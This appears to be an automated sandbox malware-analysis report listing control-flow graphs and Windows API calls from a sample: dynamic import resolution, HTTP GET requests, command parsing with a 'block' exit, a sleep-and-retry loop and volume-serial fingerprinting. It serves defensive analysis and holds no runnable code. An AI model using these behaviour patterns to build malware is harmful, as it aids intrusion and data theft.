                                                  control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                  APIs
                                                  • GetProcAddress.KERNEL32(76210000,00846A08), ref: 00419C2D
                                                  • GetProcAddress.KERNEL32(76210000,00846AC8), ref: 00419C45
                                                  • GetProcAddress.KERNEL32(76210000,00876230), ref: 00419C5E
                                                  • GetProcAddress.KERNEL32(76210000,00876098), ref: 00419C76
                                                  • GetProcAddress.KERNEL32(76210000,008760E0), ref: 00419C8E
                                                  • GetProcAddress.KERNEL32(76210000,008760F8), ref: 00419CA7
                                                  • GetProcAddress.KERNEL32(76210000,00844CC0), ref: 00419CBF
                                                  • GetProcAddress.KERNEL32(76210000,00876110), ref: 00419CD7
                                                  • GetProcAddress.KERNEL32(76210000,00876170), ref: 00419CF0
                                                  • GetProcAddress.KERNEL32(76210000,00876158), ref: 00419D08
                                                  • GetProcAddress.KERNEL32(76210000,00876188), ref: 00419D20
                                                  • GetProcAddress.KERNEL32(76210000,00846CA8), ref: 00419D39
                                                  • GetProcAddress.KERNEL32(76210000,00846B88), ref: 00419D51
                                                  • GetProcAddress.KERNEL32(76210000,00846988), ref: 00419D69
                                                  • GetProcAddress.KERNEL32(76210000,00846A48), ref: 00419D82
                                                  • GetProcAddress.KERNEL32(76210000,00876248), ref: 00419D9A
                                                  • GetProcAddress.KERNEL32(76210000,008762A8), ref: 00419DB2
                                                  • GetProcAddress.KERNEL32(76210000,00844D38), ref: 00419DCB
                                                  • GetProcAddress.KERNEL32(76210000,00846BE8), ref: 00419DE3
                                                  • GetProcAddress.KERNEL32(76210000,008761A0), ref: 00419DFB
                                                  • GetProcAddress.KERNEL32(76210000,00876260), ref: 00419E14
                                                  • GetProcAddress.KERNEL32(76210000,00876278), ref: 00419E2C
                                                  • GetProcAddress.KERNEL32(76210000,00876290), ref: 00419E44
                                                  • GetProcAddress.KERNEL32(76210000,00846C68), ref: 00419E5D
                                                  • GetProcAddress.KERNEL32(76210000,008762C0), ref: 00419E75
                                                  • GetProcAddress.KERNEL32(76210000,00878D30), ref: 00419E8D
                                                  • GetProcAddress.KERNEL32(76210000,00878C70), ref: 00419EA6
                                                  • GetProcAddress.KERNEL32(76210000,00878BE0), ref: 00419EBE
                                                  • GetProcAddress.KERNEL32(76210000,00878CE8), ref: 00419ED6
                                                  • GetProcAddress.KERNEL32(76210000,00878DF0), ref: 00419EEF
                                                  • GetProcAddress.KERNEL32(76210000,00878BB0), ref: 00419F07
                                                  • GetProcAddress.KERNEL32(76210000,00878B68), ref: 00419F1F
                                                  • GetProcAddress.KERNEL32(76210000,00878DC0), ref: 00419F38
                                                  • GetProcAddress.KERNEL32(76210000,00844420), ref: 00419F50
                                                  • GetProcAddress.KERNEL32(76210000,00878C58), ref: 00419F68
                                                  • GetProcAddress.KERNEL32(76210000,00878D48), ref: 00419F81
                                                  • GetProcAddress.KERNEL32(76210000,00846A28), ref: 00419F99
                                                  • GetProcAddress.KERNEL32(76210000,00878D90), ref: 00419FB1
                                                  • GetProcAddress.KERNEL32(76210000,00846C48), ref: 00419FCA
                                                  • GetProcAddress.KERNEL32(76210000,00878D00), ref: 00419FE2
                                                  • GetProcAddress.KERNEL32(76210000,00878C88), ref: 00419FFA
                                                  • GetProcAddress.KERNEL32(76210000,00846A88), ref: 0041A013
                                                  • GetProcAddress.KERNEL32(76210000,00846CC8), ref: 0041A02B
                                                  • LoadLibraryA.KERNEL32(00878CA0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                  • LoadLibraryA.KERNEL32(00878B08,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                  • LoadLibraryA.KERNEL32(00878C40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                  • LoadLibraryA.KERNEL32(00878B20,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                  • LoadLibraryA.KERNEL32(00878BF8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                  • LoadLibraryA.KERNEL32(00878C10,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                  • LoadLibraryA.KERNEL32(00878BC8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                  • LoadLibraryA.KERNEL32(00878CB8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                  • GetProcAddress.KERNEL32(751E0000,00846AA8), ref: 0041A0DA
                                                  • GetProcAddress.KERNEL32(751E0000,00878CD0), ref: 0041A0F2
                                                  • GetProcAddress.KERNEL32(751E0000,00849938), ref: 0041A10A
                                                  • GetProcAddress.KERNEL32(751E0000,00878C28), ref: 0041A123
                                                  • GetProcAddress.KERNEL32(751E0000,00846AE8), ref: 0041A13B
                                                  • GetProcAddress.KERNEL32(73FB0000,00844C98), ref: 0041A160
                                                  • GetProcAddress.KERNEL32(73FB0000,00846B28), ref: 0041A179
                                                  • GetProcAddress.KERNEL32(73FB0000,00844C48), ref: 0041A191
                                                  • GetProcAddress.KERNEL32(73FB0000,00878D18), ref: 0041A1A9
                                                  • GetProcAddress.KERNEL32(73FB0000,00878B50), ref: 0041A1C2
                                                  • GetProcAddress.KERNEL32(73FB0000,00847088), ref: 0041A1DA
                                                  • GetProcAddress.KERNEL32(73FB0000,00846E68), ref: 0041A1F2
                                                  • GetProcAddress.KERNEL32(73FB0000,00878D60), ref: 0041A20B
                                                  • GetProcAddress.KERNEL32(753A0000,00846DC8), ref: 0041A22C
                                                  • GetProcAddress.KERNEL32(753A0000,00846D88), ref: 0041A244
                                                  • GetProcAddress.KERNEL32(753A0000,00878D78), ref: 0041A25D
                                                  • GetProcAddress.KERNEL32(753A0000,00878DA8), ref: 0041A275
                                                  • GetProcAddress.KERNEL32(753A0000,00846F08), ref: 0041A28D
                                                  • GetProcAddress.KERNEL32(76310000,00844C70), ref: 0041A2B3
                                                  • GetProcAddress.KERNEL32(76310000,00844E78), ref: 0041A2CB
                                                  • GetProcAddress.KERNEL32(76310000,00878DD8), ref: 0041A2E3
                                                  • GetProcAddress.KERNEL32(76310000,00847028), ref: 0041A2FC
                                                  • GetProcAddress.KERNEL32(76310000,00847048), ref: 0041A314
                                                  • GetProcAddress.KERNEL32(76310000,00844D88), ref: 0041A32C
                                                  • GetProcAddress.KERNEL32(76910000,00878B38), ref: 0041A352
                                                  • GetProcAddress.KERNEL32(76910000,00846DA8), ref: 0041A36A
                                                  • GetProcAddress.KERNEL32(76910000,00849A38), ref: 0041A382
                                                  • GetProcAddress.KERNEL32(76910000,00878B80), ref: 0041A39B
                                                  • GetProcAddress.KERNEL32(76910000,00878B98), ref: 0041A3B3
                                                  • GetProcAddress.KERNEL32(76910000,00846F28), ref: 0041A3CB
                                                  • GetProcAddress.KERNEL32(76910000,00846FA8), ref: 0041A3E4
                                                  • GetProcAddress.KERNEL32(76910000,00878EB0), ref: 0041A3FC
                                                  • GetProcAddress.KERNEL32(76910000,00878E98), ref: 0041A414
                                                  • GetProcAddress.KERNEL32(75B30000,00846CE8), ref: 0041A436
                                                  • GetProcAddress.KERNEL32(75B30000,00878E08), ref: 0041A44E
                                                  • GetProcAddress.KERNEL32(75B30000,00878E38), ref: 0041A466
                                                  • GetProcAddress.KERNEL32(75B30000,00878E20), ref: 0041A47F
                                                  • GetProcAddress.KERNEL32(75B30000,00878E50), ref: 0041A497
                                                  • GetProcAddress.KERNEL32(75670000,00846F48), ref: 0041A4B8
                                                  • GetProcAddress.KERNEL32(75670000,00846DE8), ref: 0041A4D1
                                                  • GetProcAddress.KERNEL32(76AC0000,00846E28), ref: 0041A4F2
                                                  • GetProcAddress.KERNEL32(76AC0000,00878E68), ref: 0041A50A
                                                  • GetProcAddress.KERNEL32(6F4E0000,00846FC8), ref: 0041A530
                                                  • GetProcAddress.KERNEL32(6F4E0000,00846D08), ref: 0041A548
                                                  • GetProcAddress.KERNEL32(6F4E0000,00846E08), ref: 0041A560
                                                  • GetProcAddress.KERNEL32(6F4E0000,00878EC8), ref: 0041A579
                                                  • GetProcAddress.KERNEL32(6F4E0000,00846D28), ref: 0041A591
                                                  • GetProcAddress.KERNEL32(6F4E0000,00847068), ref: 0041A5A9
                                                  • GetProcAddress.KERNEL32(6F4E0000,00846F88), ref: 0041A5C2
                                                  • GetProcAddress.KERNEL32(6F4E0000,00846E48), ref: 0041A5DA
                                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0041A5F1
                                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0041A607
                                                  • GetProcAddress.KERNEL32(75AE0000,00878E80), ref: 0041A629
                                                  • GetProcAddress.KERNEL32(75AE0000,00849AE8), ref: 0041A641
                                                  • GetProcAddress.KERNEL32(75AE0000,008793D8), ref: 0041A659
                                                  • GetProcAddress.KERNEL32(75AE0000,008792B8), ref: 0041A672
                                                  • GetProcAddress.KERNEL32(76300000,00846FE8), ref: 0041A693
                                                  • GetProcAddress.KERNEL32(6FE40000,00879210), ref: 0041A6B4
                                                  • GetProcAddress.KERNEL32(6FE40000,00846F68), ref: 0041A6CD
                                                  • GetProcAddress.KERNEL32(6FE40000,008793C0), ref: 0041A6E5
                                                  • GetProcAddress.KERNEL32(6FE40000,008793F0), ref: 0041A6FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad
                                                  • String ID: HttpQueryInfoA$InternetSetOptionA$P2#v$1#v
                                                  • API String ID: 2238633743-3014924196
                                                  • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                  • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                  • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1019 406364-406392 HttpOpenRequestA 1015->1019 1016->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1013 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1029 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1029 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                  • StrCmpCA.SHLWAPI(?,0087B030), ref: 00406303
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                  • HttpOpenRequestA.WININET(00000000,GET,?,0087A1B8,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                  • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID: ERROR$ERROR$GET
                                                  • API String ID: 3074848878-2509457195
                                                  • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                  • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                  • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1103 4118c0-4118c3 1074->1103 1104 4118ca 1074->1104 1105 4118e2-4118e5 1075->1105 1106 4118ec 1075->1106 1076->1070 1085 411904-411907 1077->1085 1086 41190e 1077->1086 1091 411964-411967 1078->1091 1092 41196e 1078->1092 1094 411983-411986 1079->1094 1095 41198d 1079->1095 1087 411930 1080->1087 1088 411926-411929 1080->1088 1089 411945-411948 1081->1089 1090 41194f 1081->1090 1082->1070 1099 411870-411873 1083->1099 1100 41187a 1083->1100 1101 411892-41189c 1084->1101 1102 41189e-4118a1 1084->1102 1085->1086 1086->1070 1087->1070 1088->1087 1089->1090 1090->1070 1091->1092 1092->1070 1094->1095 1095->1070 1099->1100 1100->1070 1110 4118a8 1101->1110 1102->1110 1103->1104 1104->1070 1105->1106 1106->1070 1110->1070
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID: block
                                                  • API String ID: 3407564107-2199623458
                                                  • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                  • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                  • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1171 1170->1164 1171->1164 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1184->1291 1192 415872-415879 1185->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1185->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1164 1296->1193
                                                  APIs
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00849958,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3630751533-2791005934
                                                  • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                  • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1334 417619-417626 call 41a740 1333->1334 1335 417628-417658 wsprintfA call 41a740 1333->1335 1343 41767e-41768e 1334->1343 1335->1343
                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                  • wsprintfA.USER32 ref: 00417640
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                  • String ID: :$C$\
                                                  • API String ID: 3790021787-3809124531
                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
